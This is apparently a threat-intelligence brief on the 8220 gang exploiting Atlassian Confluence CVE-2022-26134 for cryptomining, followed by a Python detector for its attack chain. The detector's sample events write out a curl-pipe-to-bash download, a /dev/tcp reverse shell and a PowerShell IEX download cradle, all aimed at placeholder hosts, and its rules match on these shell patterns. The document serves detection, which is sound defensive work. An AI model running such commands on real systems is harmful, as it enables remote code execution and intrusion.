2022-06-14

8220 Gang Exploits Atlassian Zero-Day for Cryptomining

Industry: N/A | Level: Tactical | Source: CheckPoint

CheckPoint has identified attackers exploiting the recently patched Atlassian Confluence and Data Center vulnerability CVE-2022-26134 to install cryptominers on Linux and Windows endpoints. The 8220 cybercriminal gang is associated with this attack. Exploitation of this vulnerability typically occurs a few days after the attackers have scanned for vulnerable targets. Once targets have been identified, the malware matching the victim's operating system is downloaded onto the platform. In the Windows attack chain, the attacker uses PowerShell commands and scripts to initiate the attack; reconnaissance via WMI identifies the system's architecture so that the correct payload can be downloaded. The downloaded executables run on the host, establish persistence in the Startup folder, and consume system resources for cryptomining.

Anvilogic Scenarios:

  • 8220 Gang - Cryptominer Attack Chain - Windows
  • Unix File Download, Modified, Executed

Anvilogic Use Cases:

  • NIX Reverse Shell Commands
  • Suspicious Use of /dev/tcp
  • Suspicious process Spawned by Java
  • Invoke-Expression Command
  • Executable File Written to Disk
  • Executable Process from Suspicious Folder
  • Execution from Startup Folder
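As an added example (not code from CheckPoint or Anvilogic), the following Python detector expresses five of the use cases above as predicates over process-creation events and runs them over constructed sample events; the event layout, the rule patterns and every host or IP in the samples are assumptions, not indicators from the report.

```python
import re
from typing import Callable, Dict, List, Tuple

# One process-creation event: (os, parent_image, image, command_line).
Event = Tuple[str, str, str, str]

def _base(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower()  # file name of a Windows or POSIX path

SHELLS = {"bash", "sh", "dash", "cmd.exe", "powershell.exe", "pwsh.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
IEX = re.compile(r"(?<![\w-])(invoke-expression|iex)(?![\w-])", re.I)  # cmdlet or its alias
DEV_TCP = re.compile(r"/dev/tcp/")
REV_SHELL = re.compile(r"\b(ba)?sh\s+-i\b.*[>&]")  # interactive shell with redirected I/O
STARTUP = re.compile(r"\\start menu\\programs\\startup\\", re.I)

# Use-case name (as listed in the report) -> predicate over one event.
RULES: Dict[str, Callable[[Event], bool]] = {
    "Invoke-Expression Command": lambda e: _base(e[2]) in POWERSHELL and bool(IEX.search(e[3])),
    "Suspicious Use of /dev/tcp": lambda e: bool(DEV_TCP.search(e[3])),
    "NIX Reverse Shell Commands": lambda e: e[0] == "linux" and bool(REV_SHELL.search(e[3])),
    "Suspicious process Spawned by Java": lambda e: _base(e[1]) in {"java", "java.exe"} and _base(e[2]) in SHELLS,
    "Execution from Startup Folder": lambda e: bool(STARTUP.search(e[2])),
}

def detect(events: List[Event]) -> Dict[str, List[str]]:
    """Map each use case that fired to the image paths that triggered it."""
    hits: Dict[str, List[str]] = {}
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits.setdefault(name, []).append(ev[2])
    return hits

# Constructed sample events; hosts and IPs are placeholders, not indicators from the report.
SAMPLE_EVENTS: List[Event] = [
    # Linux: the Confluence JVM spawns a shell that fetches the next stage.
    ("linux", "/opt/atlassian/confluence/jre/bin/java", "/bin/bash",
     "bash -c 'curl -s http://placeholder.invalid/x.sh | bash'"),
    ("linux", "/bin/bash", "/bin/bash", "bash -i >& /dev/tcp/203.0.113.5/4444 0>&1"),
    # Windows: WMI architecture recon, then Invoke-Expression of a downloaded script.
    ("windows", r"C:\Program Files\Atlassian\Confluence\jre\bin\java.exe",
     r"C:\Windows\System32\cmd.exe", "cmd.exe /c wmic os get osarchitecture"),
    ("windows", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -c \"IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/a.ps1')\""),
    ("windows", r"C:\Windows\explorer.exe",
     r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svc.exe", "svc.exe"),
    # Benign admin use of PowerShell that must not fire any rule.
    ("windows", r"C:\Windows\System32\cmd.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell Get-Process"),
]
```

Running `detect(SAMPLE_EVENTS)` flags the Java-spawned shells on both platforms, the /dev/tcp reverse shell, the IEX download cradle and the Startup-folder executable, while the benign `Get-Process` invocation produces no hit.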
